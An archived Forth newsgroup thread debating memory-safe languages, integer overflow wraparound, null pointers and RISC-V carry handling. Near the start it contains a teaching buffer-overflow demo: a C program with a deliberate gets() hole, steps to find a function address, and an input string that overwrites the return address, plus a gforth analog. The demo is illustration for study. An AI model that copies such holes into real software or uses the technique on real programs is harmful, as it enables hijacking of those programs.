Krishna Myneni

2024-03-02 12:18:41 UTC

insert
right before the execute, and the dumps contain the bytes you have to
: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;
create buffer1 8 allot
:noname buffer1 96 stdin read-line . ;
execute
bye
and run it with
echo|setarch `uname -m` -R gforth xploit.fs gforth xploit.fs
7FFFE9E43160: 33 5B 57 55 55 55 00 00 - 3[WUUU..
7FFFE9AF6FF0: 68 DC ED E9 FF 7F 00 00 - h.......
exactly the bytes in the printf above.

Nice example. I can't reproduce it with an older version of gforth
(0.7.9_20220120), but the proof of concept attack is going to be Forth
system-dependent.

Curious as to why you did not use standard ACCEPT for the illustration.

--
Krishna

Krishna Myneni

2024-03-02 12:41:57 UTC

Post by Krishna Myneni
I'm wondering what the CS Forth users and Forth systems developers
make of the renewed recent push for use of memory-safe languages.
Certainly Forth can add the type of contractual safety requirements
e.g., implementing bounds checking, of a "memory-safe language". Do we
need to work on libraries for these provisions?
Opinions?

I played with a simple buffer overflow attack code in C, based on an
example I found at
https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf
=== begin code ===
/*
   Demonstrate buffer overflow exploit.
https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf
      gcc -m32 -o exploit_demo exploit_demo.c
      printf "abcdefg" | ./exploit_demo
   Find the address of MaliciousCode() within the disassembled executable
      objdump -S ./exploit_demo
      from the listing above, note the 4-byte address of MaliciousCode
      and put the address in the input string, from low-byte to high-byte.
   Exploit Example: pass a string to overflow the buffer and run
exploit code
      printf "abcdefghijklmnopqrst\x96\x91\x04\x08" | ./exploit_demo
      replace the address 0x08049196 above with the one you obtained
      from objdump command.
   The exploit will cause MaliciousCode() to execute.
*/
#include <stdio.h>
#include <stdlib.h>
void MaliciousCode() {
        printf("This code is malicious!\n");
        printf("It will not execute normally.\n");
        exit(0);
}
void GetInput() {
        char buffer[8];
        gets(buffer);
        // puts(buffer);
}
int main() {
        GetInput();
        return 0;
}
=== end code ===
It will be a useful exercise to work up a similar example in Forth, as a
step to thinking about automatic hardening techniques (as opposed to
input sanitization).
--
Krishna

Here's the output from two runs of the executable, the first with no
buffer overflow, and the second with buffer overflow.

=== begin test output ===
$ printf "abcdefg" | ./exploit_demo

$ printf "abcdefghijklmnopqrst\x96\x91\x04\x08" | ./exploit_demo
This code is malicious!
It will not execute normally.
$
=== end test output ===

I am using Fedora release 39, kernel version 6.7.5-200.fc39.x86_64, and
gcc version gcc (GCC) 13.2.1 20231205 (Red Hat 13.2.1-6)

--
Krishna

a***@spenarnc.xs4all.nl

2024-03-02 09:41:10 UTC

There is no way Forth can be a safe language in the sense of
algol/pascal/ada/go.
It is in the lane of assembler/Fortran/c.
The most that can be done is to implement a safe language on top of it,
which does not make a lot of sense.

Post by Krishna Myneni
Krishna Myneni

Groetjes Albert

Ron AARON

2024-03-03 05:54:49 UTC

One of the criteria for 8th was security -- among other things, making
it very difficult to do unsafe memory operations. Within 8th itself you
can't; but of course, with the FFI anything is possible.

dxf

2024-03-04 01:10:35 UTC

One of the criteria for 8th was security -- among other things, making it very difficult to do unsafe memory operations.

Has it paid off - by which I mean completed apps that out of the blue access
invalid memory? I'm curious as to what exactly is behind the high rate of
'memory errors' that govt et al is reporting because in my limited experience
programming in Forth, I'm just not seeing any. I wonder if it has something
to do with the practices employed in those other languages - such as the use
of third-party libraries which programmers use essentially on faith.

Ron AARON

2024-03-04 05:06:42 UTC

One of the criteria for 8th was security -- among other things, making it very difficult to do unsafe memory operations.

That's a good question, for which I don't have an answer nor even any
metrics on which to base one.

While I, personally, rarely write code that has those sorts of issues
(at least, not in 30 years), I have worked in places where they were
fairly common. It depends a lot on the expertise and attention to detail
of the programmers, I think.

Since 8th is intended for "application programmers" who may have little
experience, and since one of its primary goals is "security", I've made
it difficult to smash memory -- whether on purpose or accidentally. Of
course, that makes it stray considerably from standard Forths.

TL;DR: I don't really know.

minforth

2024-03-04 07:39:36 UTC

Post by Ron AARON
While I, personally, rarely write code that has those sorts of issues
(at least, not in 30 years), I have worked in places where they were
fairly common. It depends a lot on the expertise and attention to detail
of the programmers, I think.

I think it's also a question of the scale of the software. Forth programs
are usually microscopically small and manageable. Typical modern software
can reach gigabytes and must be created by a team of developers who sometimes
don't even work in the same place. The attack surface for errors is therefore
orders of magnitude larger. Then there is a need for many more a-priori
security functions already in the programming language and development tools,
followed by software engineering test procedures.

Ron AARON

2024-03-04 08:13:06 UTC

Yes, this too. Even when people are all in the same location, getting
everyone to work in the same direction and same style and follow the
rules can be challenging.

Anton Ertl

2024-03-04 07:57:14 UTC

Post by dxf
Has it paid off - by which I mean completed apps that out of the blue access
invalid memory?

Out of the blue? That's not how it happens.

Post by dxf
I'm curious as to what exactly is behind the high rate of
'memory errors' that govt et al is reporting because in my limited experience
programming in Forth, I'm just not seeing any.

If you don't look, or if you look in the wrong place, you don't see.
The fact that a primitive technique like throwing random input at a
program caused many supposedly-debugged programs to misbehave shows
that programmers have blind spots, especially when it comes to their
own programs. And this has nothing to do with "gigabytes of
software", this was already found at times when machines were so small
that sizes of large programs were on the order of kilowords
<https://en.wikipedia.org/wiki/Fuzzing#Early_random_testing>.

- anton

dxf

2024-03-05 04:37:24 UTC

Post by dxf
Has it paid off - by which I mean completed apps that out of the blue access
invalid memory?

Out of the blue? That's not how it happens.

Post by dxf
I'm curious as to what exactly is behind the high rate of
'memory errors' that govt et al is reporting because in my limited experience
programming in Forth, I'm just not seeing any.

Yes but asking the system to find errors isn't looking - it's covering
one's butt.

Paul Rubin

2024-03-05 05:17:21 UTC

Post by dxf
Yes but asking the system to find errors isn't looking - it's covering
one's butt.

If the implementer doesn't find them and the system doesn't find them,
that leaves them for the attackers to find. Wasn't that what you were
asking about? We are learning that the best way to prevent attackers
from finding such errors is to use tools (e.g. languages) that prevent
those errors from occurring in the first place.

dxf

2024-03-05 17:36:53 UTC

Post by dxf
Yes but asking the system to find errors isn't looking - it's covering
one's butt.

AFAIK hacks are opportunistic i.e. could not reasonably be foreseen.
Such "errors" are forgivable. Not so, programmers who either don't
know where something might overflow, or knowing, fail to address it.

Paul Rubin

2024-03-05 18:03:15 UTC

Post by dxf
AFAIK hacks are opportunistic i.e. could not reasonably be foreseen.
Such "errors" are forgivable. Not so, programmers who either don't
know where something might overflow, or knowing, fail to address it.

Humans make errors. The world's smartest mathematicians have published
proofs with mistakes. Today, there is a community that likes to
machine-check math proofs to make sure they are sound. It's the same
thing with memory-safe languages. We don't have practical ways to make
sure programs are free of all errors, but we can make sure they are free
of some common and significant types of them.

dxf

2024-03-06 00:30:32 UTC

Humans make errors. The world's smartest mathematicians have published
proofs with mistakes.

They don't make basic ones. By nature programming is defensive and
overflow would be high - if not at the top - of things a programmer
is continually evaluating. Here's a CLI app from several years ago:

https://pastebin.com/0B6kaYFJ

At no time during its writing did I consider hackers or inept users.
Responsible programming was all.

What does worry me is how programmers are being encouraged to fear
unknown terrors and to doubt their capacity to think or manage the
situation. It borders on the religious.

Paul Rubin

2024-03-06 00:54:24 UTC

Post by dxf
At no time during its writing did I consider hackers or inept users.
Responsible programming was all.

Very nice. Back in the 1980s all of us did that. Then something called
the internet came along, as did computerized banking and other systems
which attracted highly competent malicious and/or financially motivated
attackers. At that point, writing bulletproof code became not only much
harder, but also vitally important. You now must ensure not only that
your program can do what you intended, but that it can't do what you
didn't intend. Bruce Schneier[1] wrote about security engineering:

In many ways this is similar to safety engineering. ... But safety
engineering involves making sure things do not fail in the presence
of random faults: it’s about programming Murphy’s computer, if you
will. Security engineering involves making sure things do not fail
in the presence of an intelligent and malicious adversary who forces
faults at precisely the worst time and in precisely the worst
way. Security engineering involves programming Satan’s computer.
And Satan’s computer is hard to test.

[1] https://www.schneier.com/essays/archives/1999/11/why_computers_are_in.html

So sure, if you're claiming that 1980s programming didn't benefit from
memory safe languages, maybe you're right. Those of us who have to
program in the 21st century, though, need all the help we can get.

dxf

2024-03-06 01:22:58 UTC

Post by Paul Rubin
...
Those of us who have to
program in the 21st century, though, need all the help we can get.

"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.

minforth

2024-03-06 08:23:53 UTC

Post by Paul Rubin
...
Those of us who have to
program in the 21st century, though, need all the help we can get.

"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.

Confucius said:
Use program that treats integer wraparound as good feature and find yourself in big heap of dung

dxf

2024-03-06 09:02:20 UTC

... Those of us who have to
program in the 21st century, though, need all the help we can get.

"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.

Use program that treats integer wraparound as good feature and find yourself in big heap of dung

A 'memory-safe' system won't detect that. What now?

minforth

2024-03-06 09:32:29 UTC

... Those of us who have to
program in the 21st century, though, need all the help we can get.

"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.

Use program that treats integer wraparound as good feature and find yourself in big heap of dung

A 'memory-safe' system won't detect that. What now?

Wrong separation. They are related:
https://www.securecoding.com/blog/integer-overflow-attack-and-prevention/

I've been bitten in the past. Among other things, I now often use
range values, unknown to standard Forth, e.g. as array indices.

dxf

2024-03-07 01:57:26 UTC

... Those of us who have to
program in the 21st century, though, need all the help we can get.

"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.

Use program that treats integer wraparound as good feature and find yourself in big heap of dung

A 'memory-safe' system won't detect that. What now?

https://www.securecoding.com/blog/integer-overflow-attack-and-prevention/

And as it says - not easy to detect. For example it's my experience one
can input an out-of-range integer into C and Forth compilers and neither
will notice. As a 16-bit user I tend to be more conscious of overflow -
and my sometimes questionable attempts at preventing them. Humans are
always looking for an easy way out. Programmers too and I'm no exception.
OTOH I've been too long at this game to fall for promises of a 'safe'
language.

Post by minforth
I've been bitten in the past. Among other things, I now often use
range values, unknown to standard Forth, e.g. as array indices.

Well, I make mistakes too. In the app I recently posted the following
code was meant to catch overflow from nonsense input:

groupcols @ grouprows @ * groupsize @ *
( size) dup gmax 1+ 1 within if
cr ." Groups must be 1.." gmax . ." chars" .abort
then dup to gsize ...

I suspect I knew I was taking a short-cut when I wrote it but figured
it would be good enough. Perhaps it was - for my use. But looking at
it again ISTM I should have written:

: ?GERR ( f -- ) if
cr ." Groups must be 1.." gmax u. ." chars" .abort
then ;

: GROUPCHECK ( -- )
groupcols @ groupsize @ um* ?gerr grouprows @ um* ?gerr
dup 1 gmax between not ?gerr to gsize ;
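
For readers more at home in C, the same idea (check every partial product, then range-check the result) might be sketched as follows. This assumes GCC or Clang, since __builtin_mul_overflow is a compiler builtin rather than standard C, and group_check with its parameters is a hypothetical name, not part of the posted app.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical C counterpart of GROUPCHECK: multiplies cols * size * rows
   and reports failure if a partial product overflows or if the result
   lies outside 1..gmax.  On success the product is stored in *gsize. */
bool group_check(size_t cols, size_t size, size_t rows,
                 size_t gmax, size_t *gsize)
{
    size_t product;
    if (__builtin_mul_overflow(cols, size, &product))
        return false;                   /* cols * size did not fit */
    if (__builtin_mul_overflow(product, rows, &product))
        return false;                   /* ... * rows did not fit */
    if (product < 1 || product > gmax)
        return false;                   /* outside 1..gmax */
    *gsize = product;
    return true;
}
```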

Paul Rubin

2024-03-08 02:25:57 UTC

For example it's my experience one can input an out-of-range integer
into C and Forth compilers and neither will notice.... Programmers
too and I'm no exception.

These days I'd call C and Forth both niche languages, the niche being
low level systems code and small embedded programs. #1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That
slows arithmetic down but it mostly eliminates the overflow problem.

IMHO that is what all high level languages should do by default. Of
course native machine types and low level languages (C, Forth, Rust,
Ada, etc.) should stay available for cases where you want to or have to
program closer to the hardware.

Ron AARON

2024-03-08 05:10:55 UTC

For example it's my experience one can input an out-of-range integer
into C and Forth compilers and neither will notice.... Programmers
too and I'm no exception.

These days I'd call C and Forth both niche languages, the niche being
low level systems code and small embedded programs. #1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That
slows arithmetic down but it mostly eliminates the overflow problem.
IMHO that is what all high level languages should do by default. Of
course native machine types and low level languages (C, Forth, Rust,
Ada, etc.) should stay available for cases where you want to or have to
program closer to the hardware.

Just as an aside, 8th also does that. Numbers automatically grow as
needed. Yes, it's slower than native integers/floats... but it's very
convenient, and most of the time nobody notices the difference in speed.

dxf

2024-03-08 08:28:35 UTC

For example it's my experience one can input an out-of-range integer
into C and Forth compilers and neither will notice.... Programmers
too and I'm no exception.

These days I'd call C and Forth both niche languages, the niche being
low level systems code and small embedded programs. #1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That
slows arithmetic down but it mostly eliminates the overflow problem.
IMHO that is what all high level languages should do by default. Of
course native machine types and low level languages (C, Forth, Rust,
Ada, etc.) should stay available for cases where you want to or have to
program closer to the hardware.

Carl Sagan deplored how the current generation was being 'dumbed down'
and unable to even understand the issues...

Hans Bezemer

2024-03-08 17:40:49 UTC

Post by Paul Rubin
Python, which uses arbitrary precision as the native integer type. That
slows arithmetic down but it mostly eliminates the overflow problem.

A better question is - what *doesn't* slow down Python? LOL!

Hans Bezemer

Anton Ertl

2024-03-09 11:30:56 UTC

Post by Paul Rubin
#1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That
slows arithmetic down but it mostly eliminates the overflow problem.

If implemented well, the slowdown is small in the common case (small
integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very
predictable.
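
A minimal sketch of that fast path in C, assuming GCC or Clang (the builtin is not standard C). add_small is a hypothetical name, and the arbitrary-precision slow path is left out. On AMD64 these compilers typically translate the builtin into an add followed by a test of the overflow flag.

```c
#include <stdbool.h>
#include <stdint.h>

/* Fast path for adding two machine-word integers.  Returns true and
   stores the sum when it fits in 64 bits; returns false when the caller
   would have to fall back to a bignum slow path (not shown here). */
bool add_small(int64_t a, int64_t b, int64_t *sum)
{
    return !__builtin_add_overflow(a, b, sum);
}
```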

Python (particularly CPython), however, does not seem to have gone for
efficient implementation; I don't know what they do for arbitrarily
large integers, but the inner interpreter was pretty monstrous last I
looked.

I have looked at the implementation of arbitrarily large integers in
OpenJDK (could be better) and in the BC engine of Racket (could also
be better, but the BC engine is on the back burner, and they have a
JIT compiler as the main engine, but I did not find out how it
implements arbitrarily large integers).

But integer overflow is orthogonal to memory safety.

There are many people who claim that wrapping behaviour for integer
overflow is a problem. Java defines the basic types int and long to
perform wraparound on overflow, and while Java has its own share of
vulnerabilities (most prominently Log4Shell), I am not aware of one
where the wraparound behaviour was involved (but then, I have not
looked).

- anton

minforth

2024-03-09 12:17:08 UTC

Years ago we had a crash with using old archived data files
in a more recent system. The old file format relied on having
max 64k (16bit) index size, while the evaluating system assumed
24bit, and so the index overflowed the allocated memory space.
In hindsight a trivial case, but it took a while to track it down.

Anton Ertl

2024-03-09 17:27:45 UTC

Post by minforth
Years ago we had a crash with using old archived data files
in a more recent system. The old file format relied on having
max 64k (16bit) index size, while the evaluating system assumed
24bit, and so the index overflowed the allocated memory space.

Sounds like it would be caught by a memory-safe language, no integer
overflow detection necessary; and it's actually not a case of integer
overflow.

- anton

Spiros Bousbouras

2024-03-09 12:46:07 UTC

On Sat, 09 Mar 2024 11:30:56 GMT

Post by Paul Rubin
#1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That
slows arithmetic down but it mostly eliminates the overflow problem.

Don't you also need to first check that both arguments are small
integers ?

Anton Ertl

2024-03-09 17:01:30 UTC

Post by Spiros Bousbouras
On Sat, 09 Mar 2024 11:30:56 GMT

Post by Anton Ertl
If implemented well, the slowdown is small in the common case (small
integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very
predictable.

Don't you also need to first check that both arguments are small
integers ?

Yes, at some point. If the same value is used several times in a
piece of code, there is only one check needed before the first use; if
a subsequent use is not dominated by the first use, you only need
another check on those paths that bypass the first check, as in
partial redundancy elimination, resulting in one check on any path
that reaches a use of the value.

- anton

Paul Rubin

2024-03-10 04:18:34 UTC

It might be worse for RISC V. Either way though, you need either boxed
integers or tag bits.

Post by Anton Ertl
Python (particularly CPython), however, does not seem to have gone for
efficient implementation;

CPython's implementation is not very good, but there is or was a gmpy
module that let you use GMP for fast bignum arithmetic. I remember in
the Python 2.2 era it was 3x or 4x faster than CPython bignums. But, I
think it has since fallen into non-maintenance and bit rot.

Post by Anton Ertl
I don't know what they do for arbitrarily large integers, but the
inner interpreter was pretty monstrous last I looked.

CPython has a fairly straightforward bytecode interpreter.

Post by Anton Ertl
But integer overflow is orthogonal to memory safety.
There are many people who claim that wrapping behaviour for integer
overflow is a problem.

It is a problem because it's wrong! Of course it's deterministic
instead of being UB, and that makes some people feel better, but making
2+2=5 is also deterministic yet wrong. At least with UB, the
implementation can have a setting to do the right thing and trap the
overflow, instead of being mandated to quietly give wrong results.

Imagine x is a 50 element array and for whatever reason you try to
update x[60]. So the implementation might clobber 10 elements past the
end of the array (bad), or it can signal an error (the only thing that
makes sense), or in a feat of Java-like brilliance it might alias x[60]
to x[10] since 60 is 10 mod 50. That seems completely silly to me as a
default behaviour. Integer overflow wraparound is more of the same.

Yes there are situations like circular buffers where you might want that
wraparound, just like there are situations like hash functions where you
want machine word wraparound, but those are special enough to call for
explicit declarations.
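
The difference between the checked store and the explicit wraparound can be sketched in C like this. Both function names are hypothetical, and the sketch assumes the caller passes the true length of the array.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Checked store: refuses any index outside 0..len-1 and reports it. */
bool store_checked(int *x, size_t len, size_t i, int value)
{
    if (i >= len)
        return false;       /* signal the error instead of clobbering */
    x[i] = value;
    return true;
}

/* Explicit wraparound store for ring buffers: the modulus is part of
   the function's contract rather than a silent default. */
void store_ring(int *x, size_t len, size_t i, int value)
{
    assert(len > 0);        /* a modulus of zero is meaningless */
    x[i % len] = value;
}
```

With a 50-element array, store_checked rejects index 60, while store_ring writes to element 10 because the caller asked for that behaviour by name.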

Post by Anton Ertl
Java defines the basic types int and long to perform wraparound on
overflow,

Yes, a mistake IMHO. The one language that I know of that gets this
right is Ada. The default behavior is signal on overflow, but you can
specify wraparound (with any modulus you wish) if that is what your
application wants. If your modulus happens to be 2**32 or whatever, the
compiler recognizes this and generates the efficient machine code you
would expect.

minforth

2024-03-10 08:15:48 UTC

Excellent summary.

Anton Ertl

2024-03-10 08:29:13 UTC

It might be worse for RISC V.

It is. That's a failure of RISC-V.

Post by Anton Ertl
I don't know what they do for arbitrarily large integers, but the
inner interpreter was pretty monstrous last I looked.

CPython has a fairly straightforward bytecode interpreter.

When I last looked, the inner interpreter dispatch was huge, covering
the screen (maybe 50-100 lines), with lots of special cases for
various things.

Post by Anton Ertl
But integer overflow is orthogonal to memory safety.
There are many people who claim that wrapping behaviour for integer
overflow is a problem.

It is a problem because it's wrong! Of course it's deterministic
instead of being UB, and that makes some people feel better, but making
2+2=5 is also deterministic yet wrong.

In Java 2+2 gives 4. What do you hope to gain by putting up straw men?

Post by Paul Rubin
Imagine x is a 50 element array and for whatever reason you try to
update x[60].

That is a memory-safety issue, and what Java gives you in the case is
something like throwing an ArrayIndexOutOfBoundsException.

Post by Paul Rubin
So the implementation might clobber 10 elements past the
end of the array (bad), or it can signal an error (the only thing that
makes sense), or in a feat of Java-like brilliance it might alias x[60]
to x[10] since 60 is 10 mod 50.

Java does not do that. What do you hope to gain by putting up straw
men?

Post by Anton Ertl
Java defines the basic types int and long to perform wraparound on
overflow,

Yes, a mistake IMHO.

You just have no arguments but "It's wrong!" and straw men to back up
your opinion.

- anton

Paul Rubin

2024-03-10 09:56:08 UTC

Post by Paul Rubin
2+2=5 is also deterministic yet wrong.

In Java 2+2 gives 4. What do you hope to gain by putting up straw men?

2+2=5 is obviously wrong and Java doesn't go quite that far. Java
instead insists that you can add two positive integers and get a
negative one. That's wrong the same way that 2+2=5 is. It just doesn't
mess up actual programs as often, because the numbers involved are
bigger.

Post by Anton Ertl
You just have no arguments but "It's wrong!" and straw men to back up
your opinion.

In what world can it be right for n to be a positive integer and n+1 to
be a negative integer? That's not how integers work.

Tony Hoare in 2009 said about null pointers:

I call it my billion-dollar mistake. It was the invention of the
null reference in 1965. At that time, I was designing the first
comprehensive type system for references in an object oriented
language (ALGOL W). My goal was to ensure that all use of references
should be absolutely safe, with checking performed automatically by
the compiler. But I couldn't resist the temptation to put in a null
reference, simply because it was so easy to implement. This has led
to innumerable errors, vulnerabilities, and system crashes, which
have probably caused a billion dollars of pain and damage in the
last forty years.

That is, C and other such languages have null pointers because they
corresponded so conveniently to machine operations that the language
designers couldn't resist including them. Java-style wraparound
arithmetic is more of the same. A bug magnet, but irresistibly
convenient for the implementers because of its isomorphism to machine
arithmetic.

Java also has null pointers, another possible mistake. Ada doesn't have
them, nor does Python etc. C++ has them because of its C heritage and
the need to support legacy code, but I believe that in "modern" C++
style you're supposed to use references instead of pointers, so you
can't have a null or uninitialized one.

Hans Bezemer

2024-03-10 15:37:03 UTC

Post by Paul Rubin
2+2=5 is obviously wrong and Java doesn't go quite that far. Java
instead insists that you can add two positive integers and get a
negative one. That's wrong the same way that 2+2=5 is. It just doesn't
mess up actual programs as often, because the numbers involved are
bigger.

Any number representation has its problems - since there is no way to
properly represent infinite precision. If you tried to let an arbitrary
precision system represent PI properly, it would blow that system -
no matter how much hardware you threw at it. And yes, exceeding that
precision will have side effects. Deal with it. The current binary
representation was designed for raw speed - and it shows. That's how
things are. Exclamations like "BUT IT'S WRONG" may be correct, but
without a true alternative it's not gonna change much.

Post by Paul Rubin
That is, C and other such languages have null pointers because they
corresponded so conveniently to machine operations that the language
designers couldn't resist including them. Java-style wraparound
arithmetic is more of the same. A bug magnet, but irresistibly
convenient for the implementers because of its isomorphism to machine
arithmetic.

That's exactly the attitude that some people have down here. Just squat
the problem without properly thinking it through. "Yeah, let's limit
cells to 16 bits". "Yeah, let's have LOOP 'fall through' and examine every
single integer possible before stopping", "Yeah, let's introduce ?DO.
It's not gonna solve much, but it looks good", "Yeah, let's set 1 CHARS
to a single address unit", "Yeah, let's abuse the weird behavior of MOVE
when it overlaps and make it into a feature, because it's so neat".

It's the kind of design decision making that is sold as "pragmatic", but
actually is lazy and sloppy.

In 4tH, I originally started off with "0" as a NULL pointer. I quickly
found out that 80000000h (on the 32bit machine) had special properties,
which didn't make it suitable for a lot of operations. So, this became
the "error" value. As a signed number, it isn't a valid pointer anyway.
So that slowly, but surely became 4tH's error value. I haven't regretted
that since it works out a lot better than a number like "0".
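
To illustrate why a value like 80000000h can serve better than 0 as an error marker, here is a small C sketch. It is not 4tH code: ERR_VALUE and index_of are hypothetical names, and a 32-bit signed cell is assumed.

```c
#include <stdint.h>

/* 80000000h when viewed as a 32-bit cell; an assumption for this sketch. */
#define ERR_VALUE INT32_MIN

/* Returns the index of the first occurrence of c in s, or ERR_VALUE if
   c does not occur.  Index 0 stays available as a valid result. */
int32_t index_of(const char *s, char c)
{
    for (int32_t i = 0; s[i] != '\0'; i++) {
        if (s[i] == c)
            return i;
    }
    return ERR_VALUE;
}
```

A match at the very start of the string returns 0, which a "0 means error" convention could not distinguish from a failure.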

Post by Paul Rubin
Java also has null pointers, another possible mistake. Ada doesn't have
them, nor does Python etc. C++ has them because of its C heritage and
the need to support legacy code, but I believe that in "modern" C++
style you're supposed to use references instead of pointers, so you
can't have a null or uninitialized one.

It depends a lot on how error checking is handled. You could return it
like "errno" or perror(). You could throw an exception. You could return
some special value - like a NULL pointer.

Personally, I think it's kind of an overkill to throw an exception when
your substring isn't found (like in INSTR()) - but it's an interesting
thought. And what about RAII? Yeah, we hide our NULL pointer in a
boolean, so we can throw an exception anyway (sic!). Talking about
"sloppy design":

std::ofstream file("example.txt");
if (!file.is_open()) {
throw std::runtime_error("unable to open file");
}

The point is - every solution has advantages and disadvantages. Sure,
you must inform developers of the disadvantages of a chosen solution.
But you must also have the courage to fix things, gravitating to the
best solution possible. gets() is a good example. I mean, NULL is
already a macro, it shouldn't be difficult to gravitate to a better
value. When programming properly, it shouldn't even break much code -
unless you thought:

if (!fopen("myfile.txt", "r")) { .. }

was a great idea.

Hans Bezemer

Paul Rubin

2024-03-10 20:03:04 UTC

Post by Hans Bezemer
Any number representation has its problems - since there is no way to
properly represent infinite precision.

That's exactly the idea here. If the computer runs out of memory in a
bignum system, that is unquestionably an error condition. In a low
level system where the representation limit is fitting in a machine word
rather than having the whole computer memory available, the same error
condition occurs if the machine word doesn't have enough bits.

Post by Hans Bezemer
Exclamations like "BUT IT'S WRONG" may be correct, but without a true
alternative it's not gonna change much.

The true alternative is to treat overflow as an error condition, as
Ada does, and as languages with bignums do, and as even C does (C at
least permits the implementation to do the right thing, although it
doesn't require it to).

Post by Hans Bezemer
It depends a lot on how error checking is handled. You could return it
like "errno" or perror(). You could throw an exception. You could
return some special value - like a NULL pointer.

You could also use something like std::optional so that static analysis
can notify you if you don't handle the error case. Haskell in principle
does even better, letting type inference determine the error handling
strategy:

https://blogs.perl.org/users/ovid/2010/08/what-to-know-before-debating-type-systems.html

See the section "Fallacy: Static types imply longer code".

Post by Hans Bezemer
std::ofstream file("example.txt");
if (!file.is_open()) {

I have the impression that this is legacy design leaking through, but
I'm not a C++ expert by any means. See also the term "boolean blindness".

Post by Hans Bezemer
I mean, NULL is already a macro, it shouldn't be difficult to
gravitate to a better value.

The trouble is that the pointer datatype doesn't distinguish NULL from
valid addresses. A static analyzer could have an internal database of
functions whose return values should be checked against NULL, but it's
better to make it explicit in the datatype.

dxf

2024-03-11 05:26:11 UTC

...

At this point in time there's no way ?DO can be wrested away from forthers.
They'll point to all the memory errors it has prevented :)

a***@spenarnc.xs4all.nl

2024-03-11 10:15:56 UTC

It might be worse for RISC V.

It is. That's a failure of RISC-V.

As far as I can tell it was a design choice for DEC Alpha and RISC-V.
Apparently flags are detrimental to parallelism.

You can't call that a failure because you don't like it.
Groetjes Albert

Anton Ertl

2024-03-11 17:40:20 UTC

Post by a***@spenarnc.xs4all.nl

It might be worse for RISC V.

It is. That's a failure of RISC-V.

As far as I can tell it was a design choice for DEC Alpha and RISC-V.

And MIPS.

Post by a***@spenarnc.xs4all.nl
Apparently flags are detrimental to parallelism.

Reality check: No MIPS, Alpha, or RISC-V ever has had as much
instruction-level parallelism as contemporaneous CPUs for
architectures with flags, so flags are obviously not detrimental to
instruction-level parallelism.

Look at
<http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps>: The
dashed orange line near the bottom is U74, a RISC-V implementation.
The other lines are all for CPU cores with flags.

If you want to do several parallel multi-precision additions, say, if
you want a multi-precision addition a+b+c+d, having one (ARM A64) or
two (AMD64 with ADX) carry flags does indeed limit the parallelism,
but the MIPS/Alpha/RISC-V answer is to replace one ADCX/ADOX
instruction (one cycle latency) with five instructions with typically
three cycles of latency.
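
A sketch of what the flag-less approach amounts to, written in C. add_limbs is a hypothetical name, and the mnemonics in the comments are only an assumption about how a compiler might translate each line for RISC-V; they are not taken from any measured code.

```c
#include <stddef.h>
#include <stdint.h>

/* Adds two n-limb numbers (least significant limb first), r = a + b,
   without using a carry flag.  Returns the carry out of the top limb
   (0 or 1).  The five operations per limb are marked in the comments. */
uint64_t add_limbs(uint64_t *r, const uint64_t *a, const uint64_t *b,
                   size_t n)
{
    uint64_t carry = 0;
    for (size_t i = 0; i < n; i++) {
        uint64_t s  = a[i] + b[i];      /* add:  limb sum, may wrap   */
        uint64_t c1 = s < a[i];         /* sltu: did that sum wrap?   */
        uint64_t t  = s + carry;        /* add:  bring in carry-in    */
        uint64_t c2 = t < s;            /* sltu: did carry-in wrap?   */
        r[i]  = t;
        carry = c1 | c2;                /* or:   at most one is set   */
    }
    return carry;
}
```

The carry-in add depends on the previous limb's carry, so each limb's result waits on a short chain of dependent operations, where an architecture with a carry flag needs a single add-with-carry.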

On AMD64 with ADX, a 6400-bit addition of a+b+c+d can be split into
two chains: t=a+b+c and t+d; this has a total latency of about 200
cycles (actually OoO execution can reduce this somewhat by overlapping
the two chains to a certain extent), while the MIPS/Alpha/RISC-V
approach takes 300 cycles of latency with no chance of additional
overlap within that computation.

You will need >6 parallel multi-precision additions before the two
carry flags of AMD64 with ADX are theoretically more limiting than the
MIPS/Alpha/RISC-V approach. And to be practically more limiting, the
RISC-V implementation needs to be extremely wide (>36 instructions per
cycle) and the precision must be extremely high (to eliminate overlap
between chains as an issue).

Post by a***@spenarnc.xs4all.nl
You can't call that a failure because you don't like it.

The correct English term is that it's the *fault* of RISC-V. They
took a deliberate decision to need more instructions for implementing
overflow checks than other architectures, so it's their
responsibility, and for those who want to use big integers (or who
want to trap on signed overflow), their fault.

For an alternative to the RISC-V approach that is not as limiting as
the ARM A64 and AMD64 approaches, read:

http://www.complang.tuwien.ac.at/anton/tmp/carry.pdf

(not published yet)

- anton

mhx

2024-03-11 18:50:36 UTC

No / not yet?
"The requested URL /anton/tmp/opt-ipc-uarch.eps : was not found on this server."

Anton Ertl

2024-03-11 20:51:46 UTC

Post by mhx
No / not yet?
"The requested URL /anton/tmp/opt-ipc-uarch.eps : was not found on this server."

Works for me:

wget http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps
--2024-03-11 21:49:20-- http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps
Resolving www.complang.tuwien.ac.at (www.complang.tuwien.ac.at)... 128.130.173.64
Connecting to www.complang.tuwien.ac.at (www.complang.tuwien.ac.at)|128.130.173.64|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2255987 (2.2M) [application/postscript]
Saving to: 'opt-ipc-uarch.eps'

